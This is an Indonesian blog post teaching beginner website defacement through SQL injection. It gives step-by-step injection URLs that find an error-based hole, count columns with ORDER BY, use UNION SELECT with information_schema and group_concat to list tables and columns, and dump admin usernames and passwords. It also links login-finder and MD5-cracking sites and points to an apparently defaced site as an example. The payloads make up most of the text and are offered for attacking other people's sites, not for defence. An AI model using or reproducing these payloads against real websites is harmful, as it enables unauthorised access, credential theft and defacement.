Search
logo blog
Selamat Datang Di Blog Kompi Males
Terima kasih atas kunjungan Anda di blog Kompi Males,
semoga apa yang saya share di sini bisa bermanfaat dan memberikan motivasi pada kita semua
untuk terus berkarya dan berbuat sesuatu yang bisa berguna untuk orang banyak.
Inject SQL plus backdooring

Inject SQL plus backdooring

on HACKING, WEB HACKING On 01.55 with No comments


Injeck SQL plus backdooring


Injeck Sql merupakan langkah awal Deface website, bisa dikatakan hack website yang paling Newbie dari segala macam hack website. apa sih deface itu?? deface sih kalo diartikan secara kasaranya merombak total tampilan suatu website dengan script html/php yang sudah di coding sedemikian rupa tergantung di hacker yang ingin merubah tampilan suatu website, contohnya website hasil deface berikut : http://outoftheboxevents.co.uk/index.php
tampilan Home website berubah total dikarenakan script html yang di coding oleh si Pen-deface. nah, gimana tuh caranya buat kita deface website?? kita akan coba share sedikit tentang cara deface yang paling Newbie atau sederhana, pada dasarnya deface sendiri harus menemukan admin login pada website untuk kita login dan mendapatkan access masuk ke website
target deface kita, untuk  masuk ke admin panel suatu website otomatis kita butuh yang namanya *username dan *password. trus gimana tuh cara carinya?? tidak semua website yang bisa kita bobol username dan password nya cuma site-site tertentu yang terdapat celah vuln “SQL Eror” yang bisa kita masuki dan kita cari username dan passwordnya dengan tambahan script untuk mencarinya, to the point aja.
pertama kita cari target, “anggap saja sudah dapat”
misal : http://site.com/page.php?id=8
untuk mencari vuln tambahkan dibelakang url tanda/karakter ‘ atau “-”
jadi http://site.com/page.php?id=8′ atau http://site.com/page.php?id=8′
untuk menemukan apakah terdapat vuln atau tidak, jika ada maka akan muncul eror contoh nya “Error in Query” atau “syntax eror blabla”
kemudian mencari dan menghitung jumlah table yang ada dalam databasenya…
gunakan perintah : +order+by+
contoh : http://site.com/page.php?id=-8+order+by+1–
sekarang cek secara satu per satu
http://site.com/page.php?id=-8+order+by+1–
http://site.com/page.php?id=-8+order+by+2–
http://site.com/page.php?id=-8+order+by+3–
http://site.com/page.php?id=-8+order+by+4–
http://site.com/page.php?id=-8+order+by+5–
sehingga muncul error atau hilang pesan error…
misal: http://site.com/page.php?id=-8+order+by+5–
untuk mengeluarkan angka berapa yang muncul gunakan perintah union+select+1–
karena tadi error sampai angka 5
maka: http://site.com/page.php?id=-8+union+select+1,2,3,4–
nanti akan ada angka tebal atau besar yang muncul misalkan saja angka 2 yang muncul
gunakan perintah version() untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
contoh: http://site.com/page.php?id=-8+union+select+1,version(),3,4–
lihat versi yg digunakan, jika versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah from+information_schema
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah from+information_schema
Untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database()– -> dimasukan setelah angka terakhir
contoh: http://site.com/page.php?id=-8+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()–
akan muncul beberapa tabel misal : admin,comment,blog,page,produc
seumpama yg kita cari adalah “admin”
Perintah group_concat(column_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa– -> dimasukan setelah angka terakhir
Contoh : http://site.com/page.php?id=-8+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0xhexa–
pada tahap ini kalian wajib menconvert kata pada isi table menjadi hexadecimal.
website yg digunakan untuk konversi :
http://tools.magelangcyber.us/
kata yg ingin di konversi yaitu admin maka akan menjadi 61646d696e
Contoh http://site.com/page.php?id=-8+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0x61646d696e–
Memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara
perintah group_concat(0x3a,hasil isi column yg mau dikeluarkan) -> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) -> dimasukan setelah angka terakhir
Contoh : http://site.com/page.php?id=-8+union+select+1,group_concat(0x3a,hasil isi column),3,4+from+(nama table berasal)–
contoh kata yang keluar adalah adminID,Name,password
maka : http://site.com/page.php?id=-8union+select+1,group_concat(adminID,0x3a,Name,0x3a,password),3,4+from+admin–
Nah akhirnya bisa juga kan ketemu username dan passwordnya ^_^
*nb :
Login finder:
http://mormoroth.net/af/
http://tools.vyc0d.uni.cc/login_finder/
Md5 cracker :
http://www.md5decrypter.co.uk/
http://md5crack.com/
thanks to : Vyc0d : http://vyc0d.blogspot.com
kamtiez : http://kamtiez.us
blie dessy : http://www.bliedessy.web.id
Enter your email address to get update from Kompi Ajaib.
Print PDF
Next
« Prev Post Previous
Next Post »

Copyright © 2013. INFORMASI INTERNET - All Rights Reserved | Template Created by Kompi Ajaib Proudly powered by Blogger